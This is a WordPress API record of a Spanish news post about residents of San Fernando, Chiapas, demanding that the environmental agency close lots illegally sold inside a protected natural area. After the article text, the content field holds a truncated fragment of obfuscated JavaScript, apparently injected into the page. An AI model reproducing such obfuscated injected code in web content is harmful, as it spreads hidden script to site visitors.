{"id":23804,"date":"2025-09-06T02:40:42","date_gmt":"2025-09-06T02:40:42","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23804"},"modified":"2025-09-06T02:40:43","modified_gmt":"2025-09-06T02:40:43","slug":"habitantes-de-san-fernando-piden-la-clausura-de-predios-ilegales-dentro-del-area-natural-protegida","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23804","title":{"rendered":"Habitantes de San Fernando piden la clausura de predios ilegales dentro del \u00c1rea Natural Protegida"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"512\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000317082-1024x512.jpg\" alt=\"\" class=\"wp-image-23805\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000317082-1024x512.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000317082-300x150.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000317082-768x384.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000317082-1536x768.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000317082-660x330.jpg 660w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000317082-1050x525.jpg 1050w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000317082.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>5 de septiembre del 2025. &#8211; Habitantes de las zonas aleda\u00f1as a la ca\u00f1ada de San Fernando, ratificada como reserva natural al final del sexenio pasado, exigen a la delegaci\u00f3n en Chiapas de la Procuradur\u00eda Federal de Protecci\u00f3n al Ambiente encabezada por Jorge Nieto que realicen de manera cabal sus funciones y clausuren la totalidad de los predios que forman parte de la reserva y que durante los \u00faltimos a\u00f1os han sido vendidos de manera ilegal a particulares.<\/p>\n\n\n\n<p>Los denunciantes indican que si bien, la PROFEPA ha realizado la clausura de varios predios ubicados dentro del pol\u00edgono de la reserva, aun faltan muchos m\u00e1s que ya fueron vendidos o est\u00e1n pr\u00f3ximos a serlo, por lo que le solicitan a la dependencia que actue conforme a derecho antes de que la reserva siga siendo da\u00f1ada de manera irreversible.<\/p>\n\n\n\n<p>Asimismo solicitan que se investigue quien es la o las personas que se est\u00e1n viendo beneficiadas con la venta ilegal de predios y lotes dentro de la reserva, pues aseguran que podr\u00eda haber autoridades municipales y ejidales siendo participes del negocio que genera millones de pesos en perjuicio de la reserva nombrada oficialmente \u00c1rea Natural Protegida Villa de Allende, cuyo pol\u00edgono abarca parte de los municipios de San Fernando, Tuxtla Guti\u00e9rrez (la zona de La Chacona) y de Berrioz\u00e1bal.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 5 de septiembre del 2025. &#8211; Habitantes de las zonas aleda\u00f1as a la ca\u00f1ada de San Fernando, ratificada como reserva natural al final del sexenio pasado, exigen a la delegaci\u00f3n en Chiapas de la Procuradur\u00eda Federal de Protecci\u00f3n al Ambiente encabezada por Jorge Nieto que realicen de manera cabal sus funciones y clausuren &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23805,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-23804","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23804","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23804"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23804\/revisions"}],"predecessor-version":[{"id":23806,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23804\/revisions\/23806"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23805"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23804"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23804"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23804"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}